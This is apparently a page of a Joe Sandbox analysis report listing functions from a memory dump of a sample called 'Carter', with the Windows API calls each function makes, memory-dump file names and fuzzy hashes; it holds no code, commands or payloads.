                                                                              • Part of subcall function 00272111: GetStockObject.GDI32(00000011), ref: 00272163
                                                                              • Part of subcall function 00272111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0027216D
                                                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 002F7C57
                                                                            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 002F7C64
                                                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 002F7C6F
                                                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 002F7C7E
                                                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 002F7C8A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                                            • String ID: Msctls_Progress32
                                                                            • API String ID: 1025951953-3636473452
                                                                            • Opcode ID: 269063093abf59776acd8cc289e3c0ababcb024bcc9e15cc0890cac7c8f0137e
                                                                            • Instruction ID: e56a6365570cb5fae31151963800068a099ee45325a5436734e9e9d409b8505e
                                                                            • Opcode Fuzzy Hash: 269063093abf59776acd8cc289e3c0ababcb024bcc9e15cc0890cac7c8f0137e
                                                                            • Instruction Fuzzy Hash: 2F1163B115021DBEEF159F64CC85EE7BF6DEF08798F014125FB08A6050C6729C21DBA4
                                                                            Function 002941B9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00294282,?), ref: 002941D3
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 002941DA
                                                                            • EncodePointer.KERNEL32(00000000), ref: 002941E6
                                                                            • DecodePointer.KERNEL32(00000001,00294282,?), ref: 00294203
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                            • String ID: RoInitialize$combase.dll
                                                                            • API String ID: 3489934621-340411864
                                                                            • Opcode ID: 094c286ee16f9c0160c9679c5e38836172d5a2769f98c00ba238f461f9833ead
                                                                            • Instruction ID: 97e482e98884fb289399f7d5bd1c4ffc40b79726d3b3109294b8e201d5ae95c7
                                                                            • Opcode Fuzzy Hash: 094c286ee16f9c0160c9679c5e38836172d5a2769f98c00ba238f461f9833ead
                                                                            • Instruction Fuzzy Hash: C1E01A74A91741AFDF572F70EC9DB693AACA715B06F604465F401D50F0CBF540858F00
                                                                            Function 0029428E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,002941A8), ref: 002942A8
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 002942AF
                                                                            • EncodePointer.KERNEL32(00000000), ref: 002942BA
                                                                            • DecodePointer.KERNEL32(002941A8), ref: 002942D5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                            • String ID: RoUninitialize$combase.dll
                                                                            • API String ID: 3489934621-2819208100
                                                                            • Opcode ID: 3dcd4cdd9dff265045322a03cae57413f3f7c115e15f0e3a2b86f3a6eedfbc55
                                                                            • Instruction ID: f706d47da2907381c25145de14adecebbc426f49bc91a7c9ca0ee77241fdd965
                                                                            • Opcode Fuzzy Hash: 3dcd4cdd9dff265045322a03cae57413f3f7c115e15f0e3a2b86f3a6eedfbc55
                                                                            • Instruction Fuzzy Hash: 6BE0B6749A2701ABDF57AF60AD5DB453A6CBB04B02F504556F401E50F0CBB44614DA10
                                                                            Function 0027218F Relevance: 9.3, APIs: 6, Instructions: 254COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetClientRect.USER32(?,?), ref: 002721B8
                                                                            • GetWindowRect.USER32(?,?), ref: 002721F9
                                                                            • ScreenToClient.USER32(?,?), ref: 00272221
                                                                            • GetClientRect.USER32(?,?), ref: 00272350
                                                                            • GetWindowRect.USER32(?,?), ref: 00272369
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$Client$Window$Screen
                                                                            • String ID:
                                                                            • API String ID: 1296646539-0
                                                                            • Opcode ID: 2c7f5d46e3aed909f28bd2b3063946e17edefed0dcb71d61e18c4bd8145a95ed
                                                                            • Instruction ID: 93da259f0854585ddde1463ccfac8852bd507a89a8fb6192a0e577f9a4a23faf
                                                                            • Opcode Fuzzy Hash: 2c7f5d46e3aed909f28bd2b3063946e17edefed0dcb71d61e18c4bd8145a95ed
                                                                            • Instruction Fuzzy Hash: B5B17B3992024ADBDF10CFA8C9807EDB7B1FF08310F148169ED59AB215DB70AA64CB64
                                                                            Function 002D6A73 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove$__itow__swprintf
                                                                            • String ID:
                                                                            • API String ID: 3253778849-0
                                                                            • Opcode ID: c1d4d61aec3e97959054d52700e379228b0f43a147c246075d4bbaf544f73aac
                                                                            • Instruction ID: 48329e97d3d5bd0370363848059c824f5c09fed31afadb1a26c1678fccf64163
                                                                            • Opcode Fuzzy Hash: c1d4d61aec3e97959054d52700e379228b0f43a147c246075d4bbaf544f73aac
                                                                            • Instruction Fuzzy Hash: 5C619E3052025AABCF11FF60CC85EBE37A8AF05308F04855AF8996B292DB359D75CF50
                                                                            Function 002F0844 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00281A36: _memmove.LIBCMT ref: 00281A77
                                                                              • Part of subcall function 002F147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002F040D,?,?), ref: 002F1491
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002F091D
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002F095D
                                                                            • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 002F0980
                                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 002F09A9
                                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 002F09EC
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 002F09F9
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                            • String ID:
                                                                            • API String ID: 4046560759-0
                                                                            • Opcode ID: 4a93972cb52f44ade448177b14f3c848edc762a357ddc04c540d2875ba77cf19
                                                                            • Instruction ID: 22328fe05e091614f567544b270d60f1d0a34d9251bb05d3249b2cfa1df464df
                                                                            • Opcode Fuzzy Hash: 4a93972cb52f44ade448177b14f3c848edc762a357ddc04c540d2875ba77cf19
                                                                            • Instruction Fuzzy Hash: 83518B311282059FD714EF24C885E6ABBE8FF84754F04492DF589872A2EB71E925CF52
                                                                            Function 002CF688 Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VariantInit.OLEAUT32(?), ref: 002CF6A2
                                                                            • VariantClear.OLEAUT32(00000013), ref: 002CF714
                                                                            • VariantClear.OLEAUT32(00000000), ref: 002CF76F
                                                                            • _memmove.LIBCMT ref: 002CF799
                                                                            • VariantClear.OLEAUT32(?), ref: 002CF7E6
                                                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 002CF814
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$Clear$ChangeInitType_memmove
                                                                            • String ID:
                                                                            • API String ID: 1101466143-0
                                                                            • Opcode ID: 6c637feb0a416034eb78cfa34bdc1982672792cff9fcc696b7838d30f031c483
                                                                            • Instruction ID: aaa90f431800300c8c30cf9218631347b084e0037960ded1025c1eccebda1ed3
                                                                            • Opcode Fuzzy Hash: 6c637feb0a416034eb78cfa34bdc1982672792cff9fcc696b7838d30f031c483
                                                                            • Instruction Fuzzy Hash: A3515BB5A10209EFDB14CF58C884EAAB7B9FF48314F15856AE949DB300E730E915CFA0
                                                                            Function 002D29B1 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 002D29FF
                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002D2A4A
                                                                            • IsMenu.USER32(00000000), ref: 002D2A6A
                                                                            • CreatePopupMenu.USER32 ref: 002D2A9E
                                                                            • GetMenuItemCount.USER32(000000FF), ref: 002D2AFC
                                                                            • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 002D2B2D
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                            • String ID:
                                                                            • API String ID: 3311875123-0
                                                                            • Opcode ID: 873ad1fd1de3af0db19dde54e2a339c3c33b10a0106bd9b71685a090f03fb719
                                                                            • Instruction ID: 95afe9ad176ead15bfb62629b7812856115811722e6c3cd2b89e39dbc02250e4
                                                                            • Opcode Fuzzy Hash: 873ad1fd1de3af0db19dde54e2a339c3c33b10a0106bd9b71685a090f03fb719
                                                                            • Instruction Fuzzy Hash: 03519E7062020ADBDF25CF68D888BAEBBF4EF65318F10415BE8119B391D7B09D69CB51
                                                                            Function 00271B41 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 002729E2: GetWindowLongW.USER32(?,000000EB), ref: 002729F3
                                                                            • BeginPaint.USER32(?,?,?,?,?,?), ref: 00271B76
                                                                            • GetWindowRect.USER32(?,?), ref: 00271BDA
                                                                            • ScreenToClient.USER32(?,?), ref: 00271BF7
                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00271C08
                                                                            • EndPaint.USER32(?,?), ref: 00271C52
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                            • String ID:
                                                                            • API String ID: 1827037458-0
                                                                            • Opcode ID: 1070f0cf0f0dc4059774825c937e471e8f4e17786b0b0021c65c791de2da0993
                                                                            • Instruction ID: fb0dc176b4bb0b1bc8a8ef351eb6fe01b77977d9759b2add87999b2f6a2e5ff8
                                                                            • Opcode Fuzzy Hash: 1070f0cf0f0dc4059774825c937e471e8f4e17786b0b0021c65c791de2da0993
                                                                            • Instruction Fuzzy Hash: E241E3701143059FD722DF28CCC9FBA7BE8EF49324F144569F9988B2A1C7319825DB62
                                                                            Function 002E7788 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetForegroundWindow.USER32(?,?,?,?,?,?,002E550C,?,?,00000000,00000001), ref: 002E7796
                                                                              • Part of subcall function 002E406C: GetWindowRect.USER32(?,?), ref: 002E407F
                                                                            • GetDesktopWindow.USER32 ref: 002E77C0
                                                                            • GetWindowRect.USER32(00000000), ref: 002E77C7
                                                                            • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 002E77F9
                                                                              • Part of subcall function 002D57FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 002D5877
                                                                            • GetCursorPos.USER32(?), ref: 002E7825
                                                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 002E7883
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                            • String ID:
                                                                            • API String ID: 4137160315-0
                                                                            • Opcode ID: 49f271463aa4fe487402c0875c2e422ea29c9bd63ccac4d5c506b953dc59ea16
                                                                            • Instruction ID: e8053d891cad17f740cd159a68a97e1f27c9b82ab46cc2f37f3b8a8750af4daf
                                                                            • Opcode Fuzzy Hash: 49f271463aa4fe487402c0875c2e422ea29c9bd63ccac4d5c506b953dc59ea16
                                                                            • Instruction Fuzzy Hash: EE31D072509356ABD724DF14CC49F9BB7AEFF89314F00091AF58997181CA70E918CBA2
                                                                            Function 002C9431 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 002C8CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 002C8CDE
                                                                              • Part of subcall function 002C8CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 002C8CE8
                                                                              • Part of subcall function 002C8CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 002C8CF7
                                                                              • Part of subcall function 002C8CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 002C8CFE
                                                                              • Part of subcall function 002C8CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 002C8D14
                                                                            • GetLengthSid.ADVAPI32(?,00000000,002C904D), ref: 002C9482
                                                                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 002C948E
                                                                            • HeapAlloc.KERNEL32(00000000), ref: 002C9495
                                                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 002C94AE
                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,002C904D), ref: 002C94C2
                                                                            • HeapFree.KERNEL32(00000000), ref: 002C94C9
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                            • String ID:
                                                                            • API String ID: 3008561057-0
                                                                            • Opcode ID: f0cbc9bc4f183e1937f2009becc4c17f8eadfe371c4e562e53a0d55ddca95c17
                                                                            • Instruction ID: dd3451b089032cedf3f853d8e6d10e9200980d779cd05fbea965b9e7f9fcb8fc
                                                                            • Opcode Fuzzy Hash: f0cbc9bc4f183e1937f2009becc4c17f8eadfe371c4e562e53a0d55ddca95c17
                                                                            • Instruction Fuzzy Hash: A911DC76522A05EFDB298FA4CC19FAF7BBDEB45312F10821DE84593210C73699A1CB60
                                                                            Function 002C91CF Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 002C9200
                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 002C9207
                                                                            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 002C9216
                                                                            • CloseHandle.KERNEL32(00000004), ref: 002C9221
                                                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 002C9250
                                                                            • DestroyEnvironmentBlock.USERENV(00000000), ref: 002C9264
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                            • String ID:
                                                                            • API String ID: 1413079979-0
                                                                            • Opcode ID: cabc65abfd5804fc6a4d41f1c882785e951cf5d3a4a86b1e4b9070aa7759509a
                                                                            • Instruction ID: 0b520cacec5afcbb06cee26b3e4ef161eea34e0b371bd4c99f0c115ed36e23c4
                                                                            • Opcode Fuzzy Hash: cabc65abfd5804fc6a4d41f1c882785e951cf5d3a4a86b1e4b9070aa7759509a
                                                                            • Instruction Fuzzy Hash: 28114A7250124AABDB028F94DD4DFDA7BADEB08705F044159FE04A2160C6B69DA0DB61
                                                                            Function 002CC329 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDC.USER32(00000000), ref: 002CC34E
                                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 002CC35F
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 002CC366
                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 002CC36E
                                                                            • MulDiv.KERNEL32(000009EC,?,00000000), ref: 002CC385
                                                                            • MulDiv.KERNEL32(000009EC,?,?), ref: 002CC397
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: CapsDevice$Release
                                                                            • String ID:
                                                                            • API String ID: 1035833867-0
                                                                            • Opcode ID: d1529c2b4f19e337a5b21a92622505893751337200f89176d3b5a34299ed23ba
                                                                            • Instruction ID: 1604e73ff17c548512bffb2200768627536d7c5a318750211558a10c1a6a7bb6
                                                                            • Opcode Fuzzy Hash: d1529c2b4f19e337a5b21a92622505893751337200f89176d3b5a34299ed23ba
                                                                            • Instruction Fuzzy Hash: 27018475E01209BBEF119FA59C49F5EBFBCEB48311F004066FA08A7280DA319C10CFA0
                                                                            Function 002FC552 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 002716CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00271729
                                                                              • Part of subcall function 002716CF: SelectObject.GDI32(?,00000000), ref: 00271738
                                                                              • Part of subcall function 002716CF: BeginPath.GDI32(?), ref: 0027174F
                                                                              • Part of subcall function 002716CF: SelectObject.GDI32(?,00000000), ref: 00271778
                                                                            • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 002FC57C
                                                                            • LineTo.GDI32(00000000,00000003,?), ref: 002FC590
                                                                            • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 002FC59E
                                                                            • LineTo.GDI32(00000000,00000000,?), ref: 002FC5AE
                                                                            • EndPath.GDI32(00000000), ref: 002FC5BE
                                                                            • StrokePath.GDI32(00000000), ref: 002FC5CE
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                            • String ID:
                                                                            • API String ID: 43455801-0
                                                                            • Opcode ID: 5d10297e56dd5ed42289013a438d5c1b1a4683924cff6e599ecb7dfc767f7265
                                                                            • Instruction ID: 772a4c7a32a47a1eaab440197e27ca37b9f5e457ee6098a45ee290b852c4f271
                                                                            • Opcode Fuzzy Hash: 5d10297e56dd5ed42289013a438d5c1b1a4683924cff6e599ecb7dfc767f7265
                                                                            • Instruction Fuzzy Hash: C0111B7600110DBFDF129F91DC88FAA7FADEF08354F048022FA185A160C771AE65DBA0
